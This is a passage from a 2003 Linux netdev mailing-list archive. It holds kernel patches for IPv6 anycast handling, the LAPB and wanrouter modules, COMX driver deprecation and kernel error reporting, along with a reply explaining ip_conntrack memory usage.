participation. > - * > - * allow anyone to join anycasts that don't require a special route > - * and can't be spoofs of unicast addresses (reserved anycast only) > */ > if (!ip6_onlink(addr, dev)) { > if (ishost) > err = -EADDRNOTAVAIL; > - else if (!capable(CAP_NET_ADMIN)) > - err = -EPERM; > if (err) > goto out_dev_put; > - } else if (!(ipv6_addr_type(addr) & IPV6_ADDR_ANYCAST) && > - !capable(CAP_NET_ADMIN)) { > - err = -EPERM; > - goto out_dev_put; > } > > err = ipv6_dev_ac_inc(dev, addr); > @@ -266,6 +260,13 @@ > dev_put(dev); > } > > +#if 0 > +/* The function is not used, which is funny. Apparently, author > + * supposed to use it to filter out datagrams inside udp/raw but forgot. > + * > + * It is OK, anycasts are not special comparing to delivery to unicasts. 
> + */ > + > int inet6_ac_check(struct sock *sk, struct in6_addr *addr, int ifindex) > { > struct ipv6_ac_socklist *pac; > @@ -286,6 +287,8 @@ > return found; > } > > +#endif > + > static void aca_put(struct ifacaddr6 *ac) > { > if (atomic_dec_and_test(&ac->aca_refcnt)) { > @@ -347,7 +350,7 @@ > idev->ac_list = aca; > write_unlock_bh(&idev->lock); > > - ip6_rt_addr_add(&aca->aca_addr, dev); > + ip6_rt_addr_add(&aca->aca_addr, dev, 1); > > addrconf_join_solict(dev, &aca->aca_addr); > > diff -Nru a/net/ipv6/icmp.c b/net/ipv6/icmp.c > --- a/net/ipv6/icmp.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/icmp.c Fri Jul 18 00:49:43 2003 > @@ -415,8 +415,7 @@ > > saddr = &skb->nh.ipv6h->daddr; > > - if (ipv6_addr_type(saddr) & IPV6_ADDR_MULTICAST || > - ipv6_chk_acast_addr(0, saddr)) > + if (!ipv6_unicast_destination(skb)) > saddr = NULL; > > memcpy(&tmp_hdr, icmph, sizeof(tmp_hdr)); > diff -Nru a/net/ipv6/ndisc.c b/net/ipv6/ndisc.c > --- a/net/ipv6/ndisc.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/ndisc.c Fri Jul 18 00:49:43 2003 > @@ -785,8 +785,7 @@ > ipv6_addr_all_nodes(&maddr); > ndisc_send_na(dev, NULL, &maddr, &ifp->addr, > ifp->idev->cnf.forwarding, 0, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 0 : 1, > - 1); > + 1, 1); > in6_ifa_put(ifp); > return; > } > @@ -809,8 +808,7 @@ > if (neigh || !dev->hard_header) { > ndisc_send_na(dev, neigh, saddr, &ifp->addr, > ifp->idev->cnf.forwarding, 1, > - ipv6_addr_type(&ifp->addr)&IPV6_ADDR_ANYCAST ? 
0 : 1, > - 1); > + 1, 1); > if (neigh) > neigh_release(neigh); > } > diff -Nru a/net/ipv6/route.c b/net/ipv6/route.c > --- a/net/ipv6/route.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/route.c Fri Jul 18 00:49:43 2003 > @@ -1256,7 +1256,7 @@ > * Add address > */ > > -int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev) > +int ip6_rt_addr_add(struct in6_addr *addr, struct net_device *dev, int anycast) > { > struct rt6_info *rt = ip6_dst_alloc(); > > @@ -1275,6 +1275,8 @@ > rt->u.dst.obsolete = -1; > > rt->rt6i_flags = RTF_UP | RTF_NONEXTHOP; > + if (!anycast) > + rt->rt6i_flags |= RTF_LOCAL; > rt->rt6i_nexthop = ndisc_get_neigh(rt->rt6i_dev, &rt->rt6i_gateway); > if (rt->rt6i_nexthop == NULL) { > dst_free((struct dst_entry *) rt); > diff -Nru a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c > --- a/net/ipv6/tcp_ipv6.c Fri Jul 18 00:49:43 2003 > +++ b/net/ipv6/tcp_ipv6.c Fri Jul 18 00:49:43 2003 > @@ -971,7 +971,7 @@ > if (th->rst) > return; > > - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) > + if (!ipv6_unicast_destination(skb)) > return; > > /* > @@ -1175,8 +1175,7 @@ > if (skb->protocol == htons(ETH_P_IP)) > return tcp_v4_conn_request(sk, skb); > > - /* FIXME: do the same check for anycast */ > - if (ipv6_addr_is_multicast(&skb->nh.ipv6h->daddr)) > + if (!ipv6_unicast_destination(skb)) > goto drop; > > /* > -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. 
Martin: A Clash of Kings From yoshfuji@linux-ipv6.org Fri Jul 18 02:38:47 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 02:38:57 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I9cjFl030031 for ; Fri, 18 Jul 2003 02:38:46 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6I9eEBo016204; Fri, 18 Jul 2003 18:40:16 +0900 Date: Fri, 18 Jul 2003 11:40:12 +0200 (CEST) Message-Id: <20030718.114012.60686118.yoshfuji@linux-ipv6.org> To: andersg@0x63.nu Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: OOPS in ip6_output2 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> References: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4155 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030717151354.GA10640@h55p111.delphi.afb.lu.se> (at Thu, 17 Jul 2003 17:13:54 +0200), Anders Gustafsson says: > I don't follow netdev so maybe this is old stuff, but I got this oops when > trying to ssh to a ipv6-host. What version are you using? (Current tree may have fix for this.) Thanks. 
-- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From yoshfuji@linux-ipv6.org Fri Jul 18 02:53:51 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 02:53:55 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6I9rnFl032547 for ; Fri, 18 Jul 2003 02:53:50 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h6I9tSBo016301; Fri, 18 Jul 2003 18:55:28 +0900 Date: Fri, 18 Jul 2003 11:55:28 +0200 (CEST) Message-Id: <20030718.115528.21456710.yoshfuji@linux-ipv6.org> To: andersg@0x63.nu Cc: netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: OOPS in ip6_output2 From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030718094615.GD5964@h55p111.delphi.afb.lu.se> References: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> <20030718.114012.60686118.yoshfuji@linux-ipv6.org> <20030718094615.GD5964@h55p111.delphi.afb.lu.se> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4156 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030718094615.GD5964@h55p111.delphi.afb.lu.se> (at Fri, 18 Jul 2003 11:46:15 +0200), Anders Gustafsson says: > Latest bk as of wednesday I think. 
> > It did just happen once in that kernel, so I don't really know if it's > solved in latest bk which I run now. Well, I fixed a refcnt bug on Wednesday. Please tell us if you saw similar bug again. Thanks. --yoshfuji From jkenisto@us.ibm.com Fri Jul 18 10:09:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 10:09:21 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IH95Fl010899 for ; Fri, 18 Jul 2003 10:09:12 -0700 Received: from westrelay02.boulder.ibm.com (westrelay02.boulder.ibm.com [9.17.195.11]) by e35.co.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6IH86c8169732; Fri, 18 Jul 2003 13:08:06 -0400 Received: from us.ibm.com (d03av02.boulder.ibm.com [9.17.193.82]) by westrelay02.boulder.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6IH7sA4065752; Fri, 18 Jul 2003 11:07:55 -0600 Message-ID: <3F182907.30EA5922@us.ibm.com> Date: Fri, 18 Jul 2003 10:06:15 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: Andrew Morton , davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru Subject: Re: [PATCH] [1/2] kernel error reporting (revised) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4157 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev James Morris wrote: > > On Thu, 17 Jul 2003, Jim Keniston wrote: > > > 3. Given the above, what should the evlog.c caller do when > > kernel_error_event_iov() returns -EINPROGRESS? > > a. Nothing. Figure the packet will probably get logged. > > b. Just to be safe, report it via printk, the same way we report dropped > > packets. > > We currently do (a). 
(b) would mean that every event logged from IRQ > > context would be cc-ed to printk. > > I don't think this irq detection logic should be added at all here, let > the caller reschedule its logging if running in irq context. > > - James > -- > James Morris > Yes, this makes sense. At the kerror.c level, just return -EDEADLK if in_irq(). Delay packet delivery (via a tasklet, as before) at the evlog.c level instead. That way, we know at the evlog.c level (in the tasklet) whether the event packet was delivered to anybody, and can paraphrase it to printk if it wasn't. Is this the sort of thing you had in mind? Jim K From shemminger@osdl.org Fri Jul 18 12:36:35 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 12:36:45 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IJaYFl017798 for ; Fri, 18 Jul 2003 12:36:35 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IJaPI08695; Fri, 18 Jul 2003 12:36:25 -0700 Date: Fri, 18 Jul 2003 12:36:25 -0700 From: Stephen Hemminger To: Jeff Garzik Cc: Gergely Madarasz , netdev@oss.sgi.com Subject: Re: comx drivers in 2.6 Message-Id: <20030718123625.6f8ae9b9.shemminger@osdl.org> In-Reply-To: <3F173458.6060405@pobox.com> References: <20030717163337.78d123c0.shemminger@osdl.org> <3F173458.6060405@pobox.com> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4158 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev On Thu, 17 Jul 2003 19:42:16 
-0400 Jeff Garzik wrote: > Stephen Hemminger wrote: > > It looks like the comx drivers never got updated for 2.5/2.6. Some > > obvious issues are: > > - lots of use of /proc files without setting the owner field. > > - still using cli/sti > > - no SMP locking on the linked list (which could be changed to list macros) > > of hardware and protocols. > > > > Just bumped into this while trying to inspect for all the last possible > > broken usage of net_device structure. It is too far behind to address > > those issues. > > > Submit a patch to mark these CONFIG_OBSOLETE. AFAIK nobody has cared > for most of them since 2.2... (munich is an exception) > diff -Nru a/drivers/net/wan/Kconfig b/drivers/net/wan/Kconfig --- a/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 +++ b/drivers/net/wan/Kconfig Fri Jul 18 11:55:47 2003 @@ -60,9 +60,10 @@ # # COMX drivers # +# Not updated to 2.6. config COMX tristate "MultiGate (COMX) synchronous serial boards support" - depends on WAN && (ISA || PCI) + depends on WAN && (ISA || PCI) && OBSOLETE ---help--- Say Y if you want to use any board from the MultiGate (COMX) family. 
These boards are synchronous serial adapters for the PC, From dax@gurulabs.com Fri Jul 18 13:07:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 13:07:36 -0700 (PDT) Received: from mail.gurulabs.com (you@[66.62.77.7]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IK7UFl019039 for ; Fri, 18 Jul 2003 13:07:30 -0700 Received: from dhcp9.hq.gurulabs.com (dhcp9.hq.gurulabs.com [10.1.2.9]) by mail.gurulabs.com (Postfix) with ESMTP id 4015877A1 for ; Fri, 18 Jul 2003 14:07:29 -0600 (MDT) Subject: Memory usage for ip_conntrack From: Dax Kelson To: netdev@oss.sgi.com Content-Type: text/plain Message-Id: <1058558848.2674.88.camel@mentor.gurulabs.com> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 18 Jul 2003 14:07:29 -0600 Content-Transfer-Encoding: 7bit X-archive-position: 4159 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dax@gurulabs.com Precedence: bulk X-list: netdev I'm teaching a Linux class and the book says "Using ip_conntrack will use much more memory". A student asked me how much is "much". So on a 2.4.20+ how much memory does it take to track the state of a connection? If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my worst case memory usage? TIA, Dax Kelson From shemminger@osdl.org Fri Jul 18 13:32:30 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 13:32:37 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IKWTFl020036 for ; Fri, 18 Jul 2003 13:32:30 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IKWBI22711; Fri, 18 Jul 2003 13:32:12 -0700 Date: Fri, 18 Jul 2003 13:32:11 -0700 From: Stephen Hemminger To: Henner Eisen , "David S. 
Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] Remove MOD_* from LAPB Message-Id: <20030718133211.1c7ed08d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4160 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev The MOD_INC and MOD_DEC in lapb are no longer necessary in 2.6 since the module subsystem will not allow lapb to be unloaded as long as a module that is referencing the symbols (lapb_register/lapb_unregister) is loaded. The lapb parameter block does have callback's so it is up to the caller to correctly unregister on module exit; and looking at the existing code it does do that. Patch is against 2.6-test1 diff -Nru a/net/lapb/lapb_iface.c b/net/lapb/lapb_iface.c --- a/net/lapb/lapb_iface.c Fri Jul 18 13:21:02 2003 +++ b/net/lapb/lapb_iface.c Fri Jul 18 13:21:02 2003 @@ -43,13 +43,11 @@ static rwlock_t lapb_list_lock = RW_LOCK_UNLOCKED; /* - * Free an allocated lapb control block. This is done to centralise - * the MOD count code. + * Free an allocated lapb control block. 
*/ static void lapb_free_cb(struct lapb_cb *lapb) { kfree(lapb); - MOD_DEC_USE_COUNT; } static __inline__ void lapb_hold(struct lapb_cb *lapb) @@ -126,8 +124,6 @@ if (!lapb) goto out; - - MOD_INC_USE_COUNT; memset(lapb, 0x00, sizeof(*lapb)); From shemminger@osdl.org Fri Jul 18 13:35:26 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 13:35:30 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IKZPFl020426 for ; Fri, 18 Jul 2003 13:35:26 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IKZCI23380; Fri, 18 Jul 2003 13:35:12 -0700 Date: Fri, 18 Jul 2003 13:35:12 -0700 From: Stephen Hemminger To: Nenad Corbic , "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] Eliminate MOD_ from wanrouter Message-Id: <20030718133512.434b1e70.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4161 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Wan router register/unregister doesn't need MOD_INC/MOD_DEC because it can't be unloaded as long as it's symbols are in use by the calling module. 
Patch against 2.6.0-test1 diff -Nru a/net/wanrouter/wanmain.c b/net/wanrouter/wanmain.c --- a/net/wanrouter/wanmain.c Fri Jul 18 13:20:48 2003 +++ b/net/wanrouter/wanmain.c Fri Jul 18 13:20:48 2003 @@ -305,7 +305,6 @@ wandev->dev = NULL; wandev->next = wanrouter_router_devlist; wanrouter_router_devlist = wandev; - MOD_INC_USE_COUNT; /* prevent module from unloading */ return 0; } @@ -350,7 +349,6 @@ wanrouter_router_devlist = wandev->next; wanrouter_proc_delete(wandev); - MOD_DEC_USE_COUNT; return 0; } From gandalf@wlug.westbo.se Fri Jul 18 14:28:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 14:28:23 -0700 (PDT) Received: from tux.rsn.bth.se (postfix@tux.rsn.bth.se [194.47.143.135]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6ILSEFl023055 for ; Fri, 18 Jul 2003 14:28:15 -0700 Received: by tux.rsn.bth.se (Postfix, from userid 501) id 2AE863F93; Fri, 18 Jul 2003 23:28:11 +0200 (CEST) Subject: Re: Memory usage for ip_conntrack From: Martin Josefsson To: Dax Kelson Cc: netdev@oss.sgi.com In-Reply-To: <1058558848.2674.88.camel@mentor.gurulabs.com> References: <1058558848.2674.88.camel@mentor.gurulabs.com> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058563690.26030.23.camel@tux.rsn.bth.se> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.0 Date: 18 Jul 2003 23:28:10 +0200 X-archive-position: 4162 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: gandalf@wlug.westbo.se Precedence: bulk X-list: netdev On Fri, 2003-07-18 at 22:07, Dax Kelson wrote: > I'm teaching a Linux class and the book says "Using ip_conntrack will > use much more memory". > > A student asked me how much is "much". > > So on a 2.4.20+ how much memory does it take to track the state of a > connection? This depends on which patches you've applied and if you have selected NAT support when you compiled it or not. 
You can see how much memory it uses by looking at the kernel output when ip_conntrack is initialized. It looks like:

    ip_conntrack version 2.1 (5632 buckets, 45056 max) - 304 bytes per conntrack

That's the number of bytes ip_conntrack will try to allocate for each connection. But it isn't necessarily the real number of bytes allocated. You'll have to look at /proc/slabinfo for that. Look at column 4, that's the object size. In my case it's 320 bytes. And each bucket in the hash table will use 8 bytes on a 32-bit machine, 16 bytes on a 64-bit machine.

> If I echo 102400 > /proc/sys/net/ipv4/ip_conntrack_max, what is my worst
> case memory usage?

Don't do this. This will increase the maximum number of connections it will track, but not the number of buckets, which means that it will be slower due to longer collision chains. Instead, increase the number of buckets:

    modprobe ip_conntrack hashsize=131072

(or any number here. On a < 2.4.21 kernel, 2^n sizes aren't recommended due to a poor hash function; use 2^n-1 instead.)

In my case the memory usage for the above numbers would be:

    5632 buckets * 8 bytes (32-bit machine)
    + 102400 * 320 bytes (object size from slabinfo)
    = 45056 + 32768000 ~= 31.3 MB

Increasing the number of buckets doesn't cost much memory compared to the actual connections, and it gives you a nice performance boost if you are trying to handle lots of connections. (The default is based on the amount of memory in the machine, and it's normally OK for desktop machines and small servers/routers.)

ip_conntrack is a memory hog; we are working on reducing the memory usage.
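Restating the arithmetic above as code may make it easier to plug in your own numbers. This is only a sketch: the function name and its parameters are made up for illustration and are not part of ip_conntrack, and the sizes fed into it are the ones quoted in this message (8 bytes per bucket on a 32-bit machine, 320 bytes per object from /proc/slabinfo), not values read from a running kernel.

```c
#include <stdint.h>

/*
 * Hypothetical helper (not a kernel function): worst-case memory for
 * the conntrack hash table plus a completely full connection table.
 *
 *   buckets              number of hash buckets (hashsize)
 *   bytes_per_bucket     8 on 32-bit, 16 on 64-bit, per the message above
 *   max_conntracks       value of ip_conntrack_max
 *   bytes_per_conntrack  object size as reported by /proc/slabinfo
 */
static uint64_t conntrack_worst_case_bytes(uint64_t buckets,
                                           uint64_t bytes_per_bucket,
                                           uint64_t max_conntracks,
                                           uint64_t bytes_per_conntrack)
{
    return buckets * bytes_per_bucket
         + max_conntracks * bytes_per_conntrack;
}
```

With the numbers from this message, conntrack_worst_case_bytes(5632, 8, 102400, 320) works out to 45056 + 32768000 = 32813056 bytes, which is the ~31.3 MB figure.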
-- /Martin From shemminger@osdl.org Fri Jul 18 15:01:16 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 15:01:20 -0700 (PDT) Received: from mail.osdl.org (fw.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6IM1FFl024426 for ; Fri, 18 Jul 2003 15:01:16 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h6IM11I13576; Fri, 18 Jul 2003 15:01:01 -0700 Date: Fri, 18 Jul 2003 15:01:01 -0700 From: Stephen Hemminger To: Henner Eisen , "David S. Miller" Cc: netdev@oss.sgi.com Subject: [PATCH] Allow lapb to be unloaded. Message-Id: <20030718150101.0558d04e.shemminger@osdl.org> In-Reply-To: <20030718133211.1c7ed08d.shemminger@osdl.org> References: <20030718133211.1c7ed08d.shemminger@osdl.org> Organization: Open Source Development Lab X-Mailer: Sylpheed version 0.9.3claws (GTK+ 1.2.10; i686-pc-linux-gnu) X-Face: &@E+xe?c%:&e4D{>f1O<&U>2qwRREG5!}7R4;D<"NO^UI2mJ[eEOA2*3>(`Th.yP,VDPo9$ /`~cw![cmj~~jWe?AHY7D1S+\}5brN0k*NE?pPh_'_d>6;XGG[\KDRViCfumZT3@[ Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 4163 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: shemminger@osdl.org Precedence: bulk X-list: netdev Without an exit routine lapb can't be unloaded. 
Tested on 2.6.0-test1 diff -Nru a/net/lapb/lapb_iface.c b/net/lapb/lapb_iface.c --- a/net/lapb/lapb_iface.c Fri Jul 18 14:52:18 2003 +++ b/net/lapb/lapb_iface.c Fri Jul 18 14:52:18 2003 @@ -443,8 +443,14 @@ return 0; } +static void __exit lapb_exit(void) +{ + WARN_ON(!list_empty(&lapb_list)); +} + MODULE_AUTHOR("Jonathan Naylor "); MODULE_DESCRIPTION("The X.25 Link Access Procedure B link layer protocol"); MODULE_LICENSE("GPL"); module_init(lapb_init); +module_exit(lapb_exit); From jkenisto@us.ibm.com Fri Jul 18 16:32:55 2003 Received: with ECARTIS (v1.0.0; list netdev); Fri, 18 Jul 2003 16:33:03 -0700 (PDT) Received: from e4.ny.us.ibm.com (e4.ny.us.ibm.com [32.97.182.104]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6INWmFl026657 for ; Fri, 18 Jul 2003 16:32:55 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e4.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6INVNwO057664; Fri, 18 Jul 2003 19:31:26 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6INVJ7R015238; Fri, 18 Jul 2003 19:31:20 -0400 Message-ID: <3F1882CF.538FE76@us.ibm.com> Date: Fri, 18 Jul 2003 16:29:19 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: James Morris CC: Andrew Morton , davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: Re: [PATCH] [1/2] kernel error reporting (revised) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 4164 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev Jim Keniston wrote: > James Morris wrote: > > > > On Thu, 17 Jul 2003, Jim Keniston wrote: > > > > > 3. 
Given the above, what should the evlog.c caller do when > > > kernel_error_event_iov() returns -EINPROGRESS? > > > a. Nothing. Figure the packet will probably get logged. > > > b. Just to be safe, report it via printk, the same way we report dropped > > > packets. > > > We currently do (a). (b) would mean that every event logged from IRQ > > > context would be cc-ed to printk. > > > > I don't think this irq detection logic should be added at all here, let > > the caller reschedule its logging if running in irq context. > > > > - James > > -- > > James Morris > > > > Yes, this makes sense. At the kerror.c level, just return -EDEADLK if in_irq(). > Delay packet delivery (via a tasklet, as before) at the evlog.c level instead. > That way, we know at the evlog.c level (in the tasklet) whether the event packet > was delivered to anybody, and can paraphrase it to printk if it wasn't. > > Is this the sort of thing you had in mind? > Jim K I implemented the above change. Now, an event logged from an interrupt handler when nobody's listening to our socket (e.g., during boot) is paraphrased to printk. 
